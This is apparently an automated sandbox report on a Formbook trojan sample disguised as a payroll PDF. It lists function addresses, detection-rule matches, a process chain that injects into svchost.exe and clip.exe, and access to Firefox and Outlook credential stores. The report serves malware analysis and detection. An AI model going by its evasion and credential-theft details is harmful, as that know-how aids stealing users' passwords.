Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	Code function: 3_2_03AD8742	3_2_03AD8742
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049BE4F6	4_2_049BE4F6
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049B4420	4_2_049B4420
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049C2446	4_2_049C2446
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049D0591	4_2_049D0591
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04910535	4_2_04910535
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_0492C6E0	4_2_0492C6E0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_0490C7C0	4_2_0490C7C0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04934750	4_2_04934750
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04910770	4_2_04910770
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049A2000	4_2_049A2000
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049D01AA	4_2_049D01AA
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049C41A2	4_2_049C41A2
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049C81CC	4_2_049C81CC
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049AA118	4_2_049AA118
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04900100	4_2_04900100
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04998158	4_2_04998158
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049902C0	4_2_049902C0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049B0274	4_2_049B0274
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_0491E3F0	4_2_0491E3F0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049D03E6	4_2_049D03E6
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049CA352	4_2_049CA352
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049B0CB5	4_2_049B0CB5
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04900CF2	4_2_04900CF2
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04910C00	4_2_04910C00
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04928DBF	4_2_04928DBF
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_0490ADE0	4_2_0490ADE0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049ACD1F	4_2_049ACD1F
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_0491AD00	4_2_0491AD00
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04922E90	4_2_04922E90
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049CCE93	4_2_049CCE93
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049CEEDB	4_2_049CEEDB
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049CEE26	4_2_049CEE26
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04910E59	4_2_04910E59
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_0498EFA0	4_2_0498EFA0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04902FC8	4_2_04902FC8
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_0491CFE0	4_2_0491CFE0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04930F30	4_2_04930F30
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049B2F30	4_2_049B2F30
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04952F28	4_2_04952F28
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04984F40	4_2_04984F40
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_048F68B8	4_2_048F68B8
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_0493E8F0	4_2_0493E8F0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_0491A840	4_2_0491A840
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04912840	4_2_04912840
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049129A0	4_2_049129A0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049DA9A6	4_2_049DA9A6
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04926962	4_2_04926962
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_0490EA80	4_2_0490EA80
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049C6BD7	4_2_049C6BD7
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049CAB40	4_2_049CAB40
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049CF43F	4_2_049CF43F
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04901460	4_2_04901460
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049AD5B0	4_2_049AD5B0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049D95C3	4_2_049D95C3
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049C7571	4_2_049C7571
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049C16CC	4_2_049C16CC
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04955630	4_2_04955630
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049CF7B0	4_2_049CF7B0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049170C0	4_2_049170C0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049BF0CC	4_2_049BF0CC
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049C70E9	4_2_049C70E9
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049CF0E0	4_2_049CF0E0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_0491B1B0	4_2_0491B1B0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049DB16B	4_2_049DB16B
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_0494516C	4_2_0494516C
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_048FF172	4_2_048FF172
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049152A0	4_2_049152A0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_0492B2C0	4_2_0492B2C0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049B12ED	4_2_049B12ED
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_0495739A	4_2_0495739A
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049C132D	4_2_049C132D
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_048FD34C	4_2_048FD34C
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049CFCF2	4_2_049CFCF2
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04989C32	4_2_04989C32
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_0492FDC0	4_2_0492FDC0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049C1D5A	4_2_049C1D5A
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04913D40	4_2_04913D40
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049C7D73	4_2_049C7D73
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04919EB0	4_2_04919EB0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04911F92	4_2_04911F92
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049CFFB1	4_2_049CFFB1
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_048D3FD5	4_2_048D3FD5
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_048D3FD2	4_2_048D3FD2
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049CFF09	4_2_049CFF09
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049138E0	4_2_049138E0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_0497D800	4_2_0497D800
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049A5910	4_2_049A5910
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04919950	4_2_04919950
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_0492B950	4_2_0492B950
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04955AA0	4_2_04955AA0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049ADAAC	4_2_049ADAAC
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049B1AA3	4_2_049B1AA3
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049BDAC6	4_2_049BDAC6
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049CFA49	4_2_049CFA49
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049C7A46	4_2_049C7A46
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04983A6C	4_2_04983A6C
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_0492FB80	4_2_0492FB80
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_04985BF0	4_2_04985BF0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_0494DBF9	4_2_0494DBF9
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_049CFB76	4_2_049CFB76
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_005A1720	4_2_005A1720
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_005BA280	4_2_005BA280
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_0059C910	4_2_0059C910
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_0059C908	4_2_0059C908
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_0059CB30	4_2_0059CB30
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_0059ABB0	4_2_0059ABB0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_005A3270	4_2_005A3270
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_0461A43A	4_2_0461A43A
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_0461C0FC	4_2_0461C0FC
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_0461B168	4_2_0461B168
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_0461BC44	4_2_0461BC44
Source: C:\Windows\SysWOW64\clip.exe	Code function: 4_2_0461BD64	4_2_0461BD64

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03775130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03787E54 appears 111 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0372B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 037BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 037AEA12 appears 86 times
Source: C:\Windows\SysWOW64\clip.exe	Code function: String function: 0498F290 appears 105 times
Source: C:\Windows\SysWOW64\clip.exe	Code function: String function: 04957E54 appears 111 times
Source: C:\Windows\SysWOW64\clip.exe	Code function: String function: 04945130 appears 58 times
Source: C:\Windows\SysWOW64\clip.exe	Code function: String function: 0497EA12 appears 86 times
Source: C:\Windows\SysWOW64\clip.exe	Code function: String function: 048FB970 appears 280 times
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: String function: 00278B40 appears 42 times
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: String function: 00270D27 appears 70 times
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: String function: 00257F41 appears 35 times

Source: PAYROLL SUMMARY _pdf.exe, 00000000.00000003.2138561769.000000000456D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PAYROLL SUMMARY _pdf.exe
Source: PAYROLL SUMMARY _pdf.exe, 00000000.00000003.2138855842.00000000043C3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs PAYROLL SUMMARY _pdf.exe

Source: PAYROLL SUMMARY _pdf.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2332296074.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4606796602.0000000000CA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4606685527.0000000000C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.4606833986.00000000038A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2332905826.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2331839208.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.4599444998.0000000000590000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/5@15/11

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe

Code function: 0_2_002BA2D5 GetLastError,FormatMessageW,

0_2_002BA2D5

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_002A8713 AdjustTokenPrivileges,CloseHandle,		0_2_002A8713
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Code function: 0_2_002A8CC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_002A8CC3

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe

Code function: 0_2_002BB59E SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_002BB59E

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe

Code function: 0_2_002CF121 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_002CF121

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe

Code function: 0_2_002BC602 CoInitialize,CoCreateInstance,CoUninitialize,

0_2_002BC602

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe

Code function: 0_2_00254FE9 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00254FE9

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe

File created: C:\Users\user\AppData\Local\Temp\aut6A00.tmp

Jump to behavior

Source: PAYROLL SUMMARY _pdf.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: clip.exe, 00000004.00000003.2518209700.0000000000BDE000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4600545677.0000000000BD4000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000003.2516775829.0000000000BD4000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4600545677.0000000000C02000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000003.2516672622.0000000000BB3000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: PAYROLL SUMMARY _pdf.exe	ReversingLabs: Detection: 52%
Source: PAYROLL SUMMARY _pdf.exe	Virustotal: Detection: 26%

Source: unknown	Process created: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe "C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe"
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe"
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
Source: C:\Windows\SysWOW64\clip.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe"	Jump to behavior
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\PAYROLL SUMMARY _pdf.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\clip.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\clip.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: PAYROLL SUMMARY _pdf.exe

Static file information: File size 1272832 > 1048576

Source: PAYROLL SUMMARY _pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: PAYROLL SUMMARY _pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: PAYROLL SUMMARY _pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: PAYROLL SUMMARY _pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: PAYROLL SUMMARY _pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: PAYROLL SUMMARY _pdf.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: PAYROLL SUMMARY _pdf.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000003.00000002.4599743612.0000000000CAE000.00000002.00000001.01000000.00000004.sdmp, WsLcnyccsDHmlxczMuydOvvxEH.exe, 00000008.00000000.2405010509.0000000000CAE000.00000002.00000001.01000000.00000004.sdmp
Source:	Binary string: wntdll.pdbUGP source: PAYROLL SUMMARY _pdf.exe, 00000000.00000003.2142190742.0000000004490000.00000004.00001000.00020000.00000000.sdmp, PAYROLL SUMMARY _pdf.exe, 00000000.00000003.2141098342.00000000042F0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2237570493.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2239322264.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2332347193.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2332347193.0000000003700000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000004.00000003.2332132673.0000000004573000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4607431903.0000000004A6E000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000004.00000002.4607431903.00000000048D0000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 